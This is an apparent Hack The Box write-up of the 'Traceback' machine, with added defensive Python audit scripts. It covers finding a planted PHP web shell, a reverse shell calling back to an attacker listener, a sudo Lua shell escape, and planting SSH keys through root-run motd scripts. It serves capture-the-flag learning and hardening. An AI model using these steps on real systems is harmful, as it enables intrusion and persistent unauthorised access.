Traceback
Port scan
u505@naos:~/HTB/Machines/Traceback$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.181
Starting masscan 1.0.5 at 2020-12-29 21:14:48 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.181
Discovered open port 80/tcp on 10.10.10.181
u505@naos:~/HTB/Machines/Traceback$ nmap -sC -sV traceback
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-29 16:14 EST
Nmap scan report for traceback (10.10.10.181)
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.87 seconds
SSH port
u505@naos:~/HTB/Machines/Traceback$ ssh xh4h@traceback
The authenticity of host 'traceback (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traceback,10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
xh4h@traceback's password:
The SSH banner has been modified.
Web Port
u505@naos:~/HTB/Machines/Traceback$ curl http://traceback
<!DOCTYPE html>
<html>
...
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
</html>
The page source doesn't provide much information, except that a backdoor has been left somewhere.
Dirsearch
u505@naos:~/HTB/Machines/Traceback$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt,html,jpg,png,php" -f -t 100 -u http://10.10.10.181
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: txt, html, jpg, png, php | HTTP method: GET | Threads: 100 | Wordlist size: 1543640
Error Log: /opt/utils/dirsearch/logs/errors-20-12-29_16-34-40.log
Target: http://10.10.10.181/
Output File: /opt/utils/dirsearch/reports/10.10.10.181/_20-12-29_16-34-40.txt
[16:34:40] Starting:
[16:34:40] 200 -    1KB - /index.html
[16:34:41] 403 -  293B  - /icons/
[16:34:52] 200 -  529KB - /bg.jpg
CTRL+C detected: Pausing threads, please wait...
[e]xit / [c]ontinue: e
Canceled by the user
An image file is found, but it is a dead end.
u505@naos:~/HTB/Machines/Traceback$ wget traceback/bg.jpg
--2020-12-29 16:27:30--  http://traceback/bg.jpg
Resolving traceback (traceback)... 10.10.10.181
Connecting to traceback (traceback)|10.10.10.181|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 541668 (529K) [image/jpeg]
Saving to: ‘bg.jpg’
bg.jpg              100%[===================>] 528.97K   623KB/s    in 0.8s
2020-12-29 16:27:31 (623 KB/s) - ‘bg.jpg’ saved [541668/541668]
u505@naos:~/HTB/Machines/Traceback$ steghide info bg.jpg
"bg.jpg":
  format: jpeg
  capacity: 37.3 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
Dirsearch for web shells
The easiest way to leave a backdoor on a Linux host running Apache is to drop a PHP web shell. This is a quite good list of them:
u505@naos:~/HTB/Machines/Traceback$ curl https://github.com/JohnTroony/php-webshells/tree/master/Collection | html2text | grep "php$" | sed 's/\.php$//' > shelllist
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  282k    0  282k    0     0   600k      0 --:--:-- --:--:-- --:--:--  598k
I got the list and stored it in a file.
u505@naos:~/HTB/Machines/Traceback$ cat shelllist
529
AK-74
Ajax_PHP_Command_Shell
...
zacosmall
zehir4
Launch dirsearch with the shell list.
u505@naos:~/HTB/Machines/Traceback$ python3 /opt/utils/dirsearch/dirsearch.py -w shelllist -e "php" -f -t 100 -u http://10.10.10.181
  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 100 | Wordlist size: 357
Error Log: /opt/utils/dirsearch/logs/errors-20-12-29_16-39-11.log
Target: http://10.10.10.181/
Output File: /opt/utils/dirsearch/reports/10.10.10.181/_20-12-29_16-39-11.txt
[16:39:11] Starting:
[16:39:12] 200 -    1KB - /smevk.php
Task Completed
There is a PHP script :)
WebShell
The web shell asks for a password.
From the web site with the list of web shells, I download the smevk web shell source code.
u505@naos:~/HTB/Machines/Traceback$ wget https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/smevk.php
--2020-12-29 16:46:41--  https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/smevk.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 99706 (97K) [text/plain]
Saving to: ‘smevk.php’
smevk.php           100%[===================>]  97.37K  --.-KB/s    in 0.01s
2020-12-29 16:46:41 (6.81 MB/s) - ‘smevk.php’ saved [99706/99706]
The default username and password are admin/admin.
u505@naos:~/HTB/Machines/Traceback$ head smevk.php -n 23
<?php
/*
SmEvK_PaThAn Shell v3 Coded by Kashif Khan .
https://www.facebook.com/smevkpathan
smevkpathan@gmail.com
Edit Shell according to your choice.
Domain read bypass.
Enjoy!
*/
//Make your setting here.
$deface_url = 'http://pastebin.com/raw.php?i=FHfxsFGT';  //deface url here(pastebin).
$UserName = "admin";   //Your UserName here.
$auth_pass = "admin";  //Your Password.
//Change Shell Theme here//
$color = "#8B008B";  //Fonts color modify here.
$Theme = '#8B008B';  //Change border-color accoriding to your choice.
$TabsColor = '#0E5061';  //Change tabs color here.
#-------------------------------------------------------------------------------
?>
<?php
And it worked.
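As an added defensive counterpart to the dirsearch hunt above and the hard-coded admin/admin login in smevk.php, here is a small scanner (example code written for this edit, not from the write-up or the php-webshells project) that walks a web root and reports PHP files combining several web-shell indicators. The indicator list, the two-hit threshold and the sample files it builds in a temporary directory are constructed assumptions, not something the page provides.

```python
"""Scan a web root for PHP files that carry web-shell indicators.

Added example, not part of the original write-up. The indicator list, the
scoring threshold and the sample files are constructed for illustration.
"""
import os
import re
import shutil
import tempfile

# Constructed indicator list (not exhaustive): a web shell usually combines a
# command-execution or eval primitive with request-controlled input, and many
# drop-in shells such as the one in the write-up carry a hard-coded login.
INDICATORS = [
    ("exec-function", re.compile(r"\b(shell_exec|passthru|proc_open|popen|system|exec)\s*\(", re.I)),
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("request-input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I)),
    ("hardcoded-auth", re.compile(r"\$(auth_pass|UserName|pass(word)?)\s*=\s*['\"]", re.I)),
    ("obfuscation", re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
]

def score_php_source(src: str) -> set:
    """Return the names of all indicators that match one PHP source text."""
    return {name for name, rx in INDICATORS if rx.search(src)}

def scan_webroot(root: str, min_hits: int = 2) -> dict:
    """Map relative path -> sorted indicator names for every suspicious PHP file under root.

    A file is reported only when at least min_hits distinct indicators match,
    which keeps ordinary application code with a single system() call off the list.
    """
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = score_php_source(fh.read())
            except OSError:
                continue
            if len(hits) >= min_hits:
                findings[os.path.relpath(path, root)] = sorted(hits)
    return findings

def demo() -> dict:
    """Run the scan over a throw-away web root with one benign page and one shell-like file."""
    root = tempfile.mkdtemp(prefix="webroot-")
    try:
        # Constructed benign page: no execution primitive, no hard-coded credentials.
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'This site has been owned'; ?>\n")
        # Constructed shell-like file modelled on the smevk.php header quoted in the
        # write-up; the execution call is deliberately left non-functional.
        with open(os.path.join(root, "smevk.php"), "w") as fh:
            fh.write(
                "<?php\n"
                "$UserName = \"admin\"; //Your UserName here.\n"
                "$auth_pass = \"admin\"; //Your Password.\n"
                "$cmd = $_POST['cmd'];\n"
                "passthru(/* elided in this constructed sample */);\n"
                "?>\n"
            )
        return scan_webroot(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Pointing scan_webroot at a real document root (for example /var/www/html) is the intended use; the two-hit threshold trades a few missed single-primitive shells for far fewer false positives on legitimate application code.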
Upload reverse shell
I prepared my reverse shell.
u505@naos:~/HTB/Machines/Traceback$ grep CHANGE u505.php
$ip = '10.10.14.12'; // CHANGE THIS
$port = 4444; // CHANGE THIS
I raised my listener:
u505@naos:~/HTB/Machines/Traceback$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
And upload my file.
Call my reverse shell.
u505@naos:~/HTB/Machines/Traceback$ curl http://traceback/u505.php
And access is granted.
u505@naos:~/HTB/Machines/Traceback$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.181.
Ncat: Connection from 10.10.10.181:46378.
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:28:15 up 14:06,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
python3 -c 'import pty; pty.spawn("/bin/bash")'
webadmin@traceback:/$
SSH access
tail /etc/passwd
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
webadmin:x:1000:1000:traceback,,,:/home/webadmin:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
First, I look at the home directory of webadmin. I also noticed the user sysadmin.
cd /home/webadmin
webadmin@traceback:/home/webadmin$ ls -l
total 8
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16  2020 note.txt
webadmin@traceback:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
A note has been left by sysadmin.
webadmin@traceback:/home/webadmin$ cd .ssh
I generate a key pair:
u505@naos:~/HTB/Machines/Traceback$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505.key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in u505.key
Your public key has been saved in u505.key.pub
The key fingerprint is:
SHA256:AQaypxLQMuJQRZHcz78/C7+14+RCKRhX6UIvC+YKMpY u505@naos
The key's randomart image is:
+---[RSA 3072]----+
|.oo+==o .        |
|* .oo... . o     |
|=o. . o.. +      |
| o o *.+ o       |
|. .. oS* + .     |
| .E . o + o      |
| . o . . .+ o    |
| . .oo+..        |
| .=*+.           |
+----[SHA256]-----+
webadmin@traceback:/home/webadmin/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCl6LNtADuE5AeTNcF0whGHx2/YRyNLjvHLq/QOnQcjrhs1+m4Yhjxb49JCOyCkh/ZsdW3yGw6alJHu3ucouQVW/CaXKk9fm1HQtklL7e4bWWeSvPChuI2egZdoB/7nxrOYX8lGrLrBzvdT0y0RMTtKjfTRdbajOSsaN+oPN7DYnrjM/ZBRd41XbJ7SVkz4fxKFeU0ZzVVTLHanuDmGFJHgMKZjnMTiflIWRSmLCRKkcq3UpTgkGXy3aBy9K8zfK2UjcFkym8X/edeRltV3W2t1hqwoex8sA3axLno4q6brsbns7TN+RmukfrUWuejESZXz7iPR15SEopsKpfw0/wLagpSccEvZ4oTrnhmSg7Kc3248LkhTS/cbGWzqMusCFhL6AM1rSVeNz4DtESCsRssQkVjO7qe6IWW0rRrT6tX4eeSFsyPNxtZCuVIumZ78CB3q1eQgZbwPWPOXs8ROgtwUZPSlmE7ZCji/TSz/ZKR6JdPaL8ra1f5xEH4DDFMtPU= u505@naos' > authorized_keys
webadmin@traceback:/home/webadmin/.ssh$ chmod 600 authorized_keys
Now I can log in with comfortable SSH access.
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key webadmin@traceback
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Feb 27 06:29:02 2020 from 10.10.14.3
webadmin@traceback:~$ whoami
webadmin
Webadmin enum
u505@naos:~/HTB/Machines/Traceback$ scp -i u505.key LinEnum.sh pspy64 webadmin@traceback:/home/webadmin/
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
LinEnum.sh                                    100%   46KB 353.5KB/s   00:00
pspy64s                                       100% 1129KB   2.9MB/s   00:00
webadmin@traceback:~$ ./LinEnum.sh -t
The enumeration finds that sudo can be used without a password.
[+] We can sudo without supplying a password!
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
And the bash history shows that the Lua tool has already been used with sudo:
/home/webadmin/.bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
stty raw -echostty raw -echo
stty raw -echo
ls
exit
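As an added example (not from the write-up), the audit below parses the rule section of `sudo -l` output and flags rules whose command is an interpreter or editor, which is what turned the luvit rule above into a pivot. The interpreter list, the rule regex and the sample output (the write-up's luvit rule plus a constructed backup.sh rule for contrast) are assumptions made for this example.

```python
"""Flag sudo rules that hand out an interpreter, with or without a password.

Added example, not part of the write-up. It parses the rule section of
`sudo -l` output (the sample below is constructed around the rule quoted in the
write-up) and reports rules whose command is an interpreter or editor, since
those let the invoking user obtain an interactive shell as the run-as user.
"""
import os
import re

# Constructed list of interpreters/editors that yield a shell when run under sudo
# (luvit, the Lua runtime from the write-up, included; the list is not exhaustive).
INTERPRETERS = {"luvit", "lua", "python", "python3", "perl", "ruby", "node", "php",
                "sh", "bash", "vi", "vim", "nano", "less", "more"}

# One rule line: "(runas) [TAG: ...] command[, command...]"
RULE_RX = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>\S.*)$")

# Constructed sudo -l output: the first rule is the one from the write-up,
# the second is a harmless custom script added for contrast.
SAMPLE = r"""Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/local/bin/backup.sh
"""

def parse_sudo_l(text: str) -> list:
    """Return [(runas, tags, command)] for each rule listed after the 'may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RX.match(line) if in_rules else None
        if not m:
            continue
        tags = set(re.findall(r"\w+", m.group("tags")))
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append((m.group("runas").strip(), tags, cmd.strip()))
    return rules

def assess(rules: list) -> list:
    """Return a finding for every rule whose command is ALL or a shell-capable interpreter."""
    findings = []
    for runas, tags, cmd in rules:
        binary = cmd.split()[0]
        base = os.path.basename(binary)
        if cmd != "ALL" and base not in INTERPRETERS:
            continue
        reasons = ["any command allowed" if cmd == "ALL" else f"{base} can spawn a shell"]
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        # If the binary exists on this host, also check whether a non-root user could replace it.
        if os.path.exists(binary):
            st = os.stat(binary)
            if st.st_uid != 0 or st.st_mode & 0o022:
                reasons.append("binary is not root-owned and read-only for others")
        findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings

def demo() -> list:
    """Assess the constructed sample; on a live host feed it the real `sudo -l` text instead."""
    return assess(parse_sudo_l(SAMPLE))

if __name__ == "__main__":
    for f in demo():
        print(f"run as {f['runas']}: {f['command']} -> {'; '.join(f['reasons'])}")
```

The remediation this points at is the usual one: grant a wrapper script with fixed arguments rather than the interpreter itself, and keep the target binary root-owned, since a user-owned binary under sudo is equivalent to ALL.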
Pivot to user sysadmin
We create a Lua file and execute it as sysadmin:
webadmin@traceback:~$ echo 'os.execute("/bin/sh")' > privesc.lua
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit /home/webadmin/privesc.lua
$ whoami
sysadmin
Again, we give ourselves comfortable access via SSH.
$ pwd
/home/webadmin
$ echo 'ssh-rsa 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 u505@naos' > /home/sysadmin/.ssh/authorized_keys
$ chmod 600 /home/sysadmin/.ssh/authorized_keys
Et voilà:
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key sysadmin@traceback
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 29 15:32:43 2020 from 10.10.14.12
$ whoami
sysadmin
User flag
$ cat user.txt <USER_FLAG>
Sysadmin enum
$ cd /home/webadmin
$ ./LinEnum.sh -t
And pspy64:
webadmin@traceback:~$ ./pspy64
...
2020/12/30 04:05:01 CMD: UID=0    PID=15206  | sleep 30
2020/12/30 04:05:01 CMD: UID=0    PID=15205  | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/12/30 04:05:01 CMD: UID=0    PID=15204  | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/12/30 04:05:01 CMD: UID=0    PID=15203  | /usr/sbin/CRON -f
2020/12/30 04:05:01 CMD: UID=0    PID=15202  | /usr/sbin/CRON -f
2020/12/30 04:05:31 CMD: UID=0    PID=15208  | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
...
There is a cron job running as root that copies the files from /var/backups/.update-motd.d/ to /etc/update-motd.d/ every 30 seconds.
$ cd /var/backups/.update-motd.d/
$ ls -ltra
total 32
-rwxr-xr-x 1 root root  299 Aug 25  2019 91-release-upgrade
-rwxr-xr-x 1 root root  604 Aug 25  2019 80-esm
-rwxr-xr-x 1 root root 4264 Aug 25  2019 50-motd-news
drwxr-xr-x 3 root root 4096 Aug 25  2019 ..
-rwxr-xr-x 1 root root  981 Aug 25  2019 00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 10-help-text
drwxr-xr-x 2 root root 4096 Mar  5  2020 .
We don't have the rights to change the files in /var/backups/.update-motd.d/. But a second glance at the LinEnum results shows:
[-] Files not owned by user but writable by group:
-rwxrwxr-x 1 root sysadmin 4264 Dec 30 04:02 /etc/update-motd.d/50-motd-news
-rwxrwxr-x 1 root sysadmin 982 Dec 30 04:02 /etc/update-motd.d/10-help-text
-rwxrwxr-x 1 root sysadmin 299 Dec 30 04:02 /etc/update-motd.d/91-release-upgrade
-rwxrwxr-x 1 root sysadmin 981 Dec 30 04:02 /etc/update-motd.d/00-header
-rwxrwxr-x 1 root sysadmin 604 Dec 30 04:02 /etc/update-motd.d/80-esm
-rw-rw-rw- 1 webadmin webadmin 22 Dec 30 03:52 /home/webadmin/privesc.lua
As sysadmin, we have write access to the files in /etc/update-motd.d.
Privilege escalation
$ man update-motd
Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login, and this information is concatenated in /run/motd.dynamic. The order of script execution is determined by the run-parts(8) --lsbsysinit option (basically alphabetical order, with a few caveats).
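The weakness here is a root cron job restoring scripts into /etc/update-motd.d that stay group-writable by sysadmin, while pam_motd executes them as root at every login. As an added example (not part of the write-up), the audit below checks such root-executed directories for entries a non-root user could modify; the directory list is an assumption, and the demo builds a constructed look-alike directory in a temporary location so it runs without root.

```python
"""Audit directories whose scripts run as root for entries a non-root user could alter.

Added example, not from the original write-up. It reproduces the condition the
write-up found (group-writable scripts in /etc/update-motd.d, executed by
pam_motd as root) against a constructed temporary directory, so it runs
offline and without root.
"""
import os
import shutil
import stat
import tempfile

# Directories whose contents a typical Ubuntu host executes as root
# (assumption: chosen from the write-up's /etc/update-motd.d plus the cron dirs).
ROOT_EXEC_DIRS = ["/etc/update-motd.d", "/etc/cron.d", "/etc/cron.daily", "/etc/cron.hourly"]

def modifiable_by_others(path: str, trusted_uid: int = 0, trusted_gid=0) -> list:
    """List why the entry at path could be changed by someone other than the trusted owner.

    Reports symlinks (a root cron job copying or executing through them follows
    the target), non-trusted ownership, world-write and group-write bits. Pass
    trusted_gid=None to flag every group-writable entry regardless of group.
    """
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["symlink"]
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not the trusted owner")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        reasons.append(f"group-writable (gid {st.st_gid})")
    return reasons

def audit_dir(directory: str, trusted_uid: int = 0, trusted_gid=0) -> dict:
    """Map each offending path under directory to its reasons; {} if the directory is absent."""
    findings = {}
    if not os.path.isdir(directory):
        return findings
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        reasons = modifiable_by_others(path, trusted_uid, trusted_gid)
        if reasons:
            findings[path] = reasons
    return findings

def demo() -> dict:
    """Build a constructed update-motd.d look-alike and return {basename: reasons}."""
    root = tempfile.mkdtemp(prefix="update-motd.d-")
    try:
        # Modes mirror the write-up: 00-header is group-writable (-rwxrwxr-x);
        # 10-help-text is the correct -rwxr-xr-x; 50-motd-news is made world-writable.
        for name, mode in {"00-header": 0o775, "10-help-text": 0o755, "50-motd-news": 0o777}.items():
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho Welcome\n")
            os.chmod(path, mode)
        # A symlink dropped into the directory is reported on its own.
        os.symlink("10-help-text", os.path.join(root, "80-esm"))
        # The files belong to the current user, so treat that uid as trusted and
        # flag any group-write bit (trusted_gid=None).
        found = audit_dir(root, trusted_uid=os.getuid(), trusted_gid=None)
        return {os.path.basename(p): r for p, r in found.items()}
    finally:
        shutil.rmtree(root, ignore_errors=True)

if __name__ == "__main__":
    for d in ROOT_EXEC_DIRS:
        for path, reasons in audit_dir(d).items():
            print(f"{path}: {'; '.join(reasons)}")
```

Run as-is, the main block audits the real directories with root as the only trusted owner and group; a clean Ubuntu host prints nothing, while the permissions shown in the write-up's LinEnum output would be reported as group-writable by gid of sysadmin. Note that the backup-and-restore cron job seen in pspy does not fix the problem, because cp preserves neither the intended mode nor protects the 30-second window between edit and overwrite.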
We check the folder:
$ cd /etc/update-motd.d
$ ls -l
total 24
-rwxrwxr-x 1 root sysadmin  981 Dec 30 04:14 00-header
-rwxrwxr-x 1 root sysadmin  982 Dec 30 04:14 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Dec 30 04:14 50-motd-news
-rwxrwxr-x 1 root sysadmin  604 Dec 30 04:14 80-esm
-rwxrwxr-x 1 root sysadmin  299 Dec 30 04:14 91-release-upgrade
We can modify the 00-header file:
$ vi 00-header
$ cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\nWelcome to Xh4H land \n"
echo "\nU505 was here too!"
echo 'ssh-rsa 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 u505@naos' > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
$ exit
Connection to traceback closed.
We log in once as sysadmin so that pam_motd runs the modified script (before the cron job overwrites it).
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key sysadmin@traceback
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
U505 was here too!
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Dec 30 03:57:54 2020 from 10.10.14.12
$ exit
Connection to traceback closed.
Now we can login as root.
u505@naos:~/HTB/Machines/Traceback$ ssh -i u505.key root@traceback
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Dec 29 15:33:03 2020 from 10.10.14.12
root@traceback:~# whoami
root
root@traceback:~# cat root.txt
<ROOT_FLAG>
References
- https://github.com/JohnTroony/php-webshells: Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server!
- https://gtfobins.github.io/gtfobins/lua/
Daniel Simao 05:48, 30 December 2020 (EST)